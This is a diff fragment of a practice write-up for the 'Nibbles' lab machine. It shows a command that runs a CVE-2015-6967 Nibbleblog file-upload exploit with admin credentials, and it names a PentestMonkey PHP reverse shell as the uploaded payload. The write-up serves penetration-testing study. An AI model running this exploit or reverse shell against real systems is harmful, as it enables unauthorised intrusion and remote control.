randalltr/oscp-pg-practice-writeups/nibbles/nibbles.md

 python3 exploit.py --url http://10.129.20.119/nibbleblog/ --username admin --password nibbles --payload shell.php
 ```

-With `exploit.py` as the CVE-2015-6967 Arbitrary File Upload and `shell.php` the default PentestMonkey PHP reverse shell.
+With the CVE-2015-6967 Arbitrary File Upload as `exploit.py` and the default PentestMonkey PHP reverse shell as `shell.php`.

 A reverse shell was caught: